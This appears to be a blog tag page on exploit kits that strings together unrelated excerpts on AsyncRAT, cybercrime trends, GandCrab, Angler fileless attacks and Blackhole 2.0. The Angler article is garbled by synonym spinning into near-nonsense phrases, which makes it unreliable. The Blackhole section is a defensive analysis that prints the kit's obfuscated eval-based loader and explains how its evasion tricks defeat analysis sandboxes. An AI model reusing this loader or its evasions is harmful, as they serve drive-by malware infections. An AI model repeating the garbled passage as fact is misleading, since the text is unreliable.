#exploit kits

En el vertiginoso mundo de las amenazas persistentes avanzadas (APT) y el ciberdelito, emerge una sombra sigilosa, un depredador digital que acecha en las profundidades de la red: AsyncRAT. No es un actor nuevo en la escena, pero su constante evolución y su presencia ubicua lo convierten en un tema de análisis ineludible para cualquier profesional de la seguridad informática que se precie. ¿Creen…

Understanding the Evolution of Cybercrime to Predict its Future

Home › Disaster Recovery Understanding the Evolution of Cybercrime to Predict its Future By Kevin Townsend on July 21, 2022 Tweet An analysis of the evolution of cybercrime from its beginnings in the 1990s to its billion-dollar presence today has one overriding theme: the development of cybercrime as a business closely mimics the evolution of legitimate business, and will continue to evolve to…

Un nuevo ransomware llamado GandCrab fue lanzado hacia el final de la semana pasada que se está distribuyendo actualmente a través de kits de exploits. GandCrab tiene algunas características interesantes que no se habían visto antes en un ransomware, como ser el primero en aceptar la moneda DASH y el primero en utilizar el .BIT tld que funciona con Namecoin.

Descubiertos por primera vez por el…

New attacks with the Angler exploit kit inject code directly therein browser processes without leaving files on cut, a researcher cut.<\p>

Cybercriminals are increasingly infecting computers with malware that resides only in memory in order to wreak their attacks harder to detect.<\p>

Recent attacks launched with the Angler exploit kit -- a Web-based attack tool -- injected malicious code directly into other processes and did not create malicious files whereto affected computers, an discretionary malware delver known online as things go Kafeine said Sunday in a blog post.<\p>

Fileless malware threats are not new, if not their employment is striking, specially in large scale attacks, because they don't persist across conception reboots when blobby eminence grise memory (RAM) is cleared.<\p>

In a idiosyncratic drive-by download mo the victims visit a compromised website that redirects their browsers to an autonomic epilepsy page -- usually an exploit kit's landing page. The exploit kit scans browsers from not worth saving versions of Dash Player, Adobe Reader, Java gyron Microsoft Silverlight and tries to manipulate known vulnerabilities in those plug-ins to install malware.<\p>

The truckload is usually a condition called a dropper whose purpose is to download and install one or more malware programs.<\p>

The past Angler exploits seen by Kafeine had a different final repertory drama. Instead of installing a malware program in hand plait, i myself injected malicious penal code dead in the browser process, frame it much harder for security software to perceive the get going.<\p>

Kafeine sounded that his usual tools were not able to capture the guided missile and that it even bypassed a host-based inroad prevention symmetry (HIPS) he was using.<\p>

The fileless outrage technique opens a wide range in relation with possibilities for attackers as it provides a powerful mileage so that main drag antivirus detection, it's guiding light for running a one-time information stealing program and alter allows them toward congregate information about a compromised computer prior to deploying a more persistent threat that defeats its defenses, he said.<\p>

"The introduction of memory-based malware is definitely a fingerprint up for cyber-criminals," said Bogdan Botezatu, a ruler e-threat narcotherapist at Bitdefender, Tuesday via email. "I didn't expect to see this technique included inward a commercially-available exploit armament though, to illustrate money-driven cyber-criminals would rather bargain stealth for decidedness."<\p>

Malware that resides at worst in memory is more typical of high-profile and state-sponsored attacks, because it allows attackers as far as infect the object, exfiltrate information and leave no trace in relation with coat for forensic analysis, Botezatu vocalized.<\p>

Thank Lucian Constantin @ techworld.com Original URL: http:\\news.techworld.com\security\3542948\hackers-make-drive-by-download-attacks-stealthier-with-fileless-infections\ <\p>

Recently I found a few URLs in the wild that were installations of the Blackhole 2.0 exploit kit. At this moment this is the latest version of one of the most popular exploit kits out there. In this post I focus mainly on the client side evasions that Blackhole is performing to avoid getting detected.

Here is a snippet of the first step of the attack:

a=document[g]("google"); s=""; for(i=0;;i++){ r=a[gg]("d".concat(i)); if(r){s=s+r;}else break; } a=s; a=a.replace(/[^0-9a-z]/g,""); s=""; for(i=0;i < a.length;i+=2){ try{gbargre-0x32} catch(sdgsdg){ if(020==0x10)s+=ss(parseInt(a.substr(i,2),28)); } } try{(alert+"fewfbw")()} catch(adgsdg){window["e"+"v"+"a"+"l"](s);}

All obfuscated strings are on the DOM tree scattered as d[0-9]{1,2} attributes on a element with id named "google". The obfuscated strings are loaded from the DOM tree, get combined, deobfuscated and then the final string gets executed. The story of every drive-by download attack's life.

But here is the interesting part: in this small snippet of code there are 4(!) evasion attempts (that I can identify). 

1. [line 4] "d".concat(i)

This was evading Wepawet, because at some point along the path of execution the argument of concat function was treated as a string and not as the string representation of any object that we are trying to concatenate. This is no longer the case ;)

2. [line 11] try{gbargre-0x32}

I suspect that on another honeyclient the JavaScript engine has this variable accessible and they are checking it or they want to make sure that the JavaScript engine is actually throwing exceptions on garbage statements.

3. [line 12] if(020==0x10)

Again there should be a bug in one of the monitoring environments that the attackers want to avoid where in that world 020 is not equal to 0x10. Remember that in JavaScript positive octal number start with a zero, so 020 should be interpreted as 16 in decimal.

4. [line 15] try{(alert+"fewfbw")()}

The expected behavior here is that alert will return its string representation, which is function alert() { [native code] } and then "fewfbw" will be concatenated to that resulting to "function alert() { [native code] }fewfbw". This should throw an exception when we try to call it as a function. Instead the attackers expect that there is a system where this will return a valid function pointer which is callable. 

On the next blog post I will go through the evasions that I found once the PDF exploit is launched!

--

One of the issues around the malware threat today, and the botnet threat specifically, is that in general creators of malware are no longer seeking notoriety. They're doing it for financial gain. Malware is centered around profit and it will interact with anyone. Once it connects to a device it will communicate with someone to either steal data or take other actions. So we're always concerned around loss of data or credentials that could be used to commit fraud.

I can't give you exact numbers on how much the threat has grown in recent years, but I can tell you it's exploded. You don't have to be technically proficient to write malware anymore. You can pay someone to do it as a service. You can easily find kits that will build malware, and you can even choose what you want it to do. We are to the point now where some of these kits and malware authors even offer support for their product.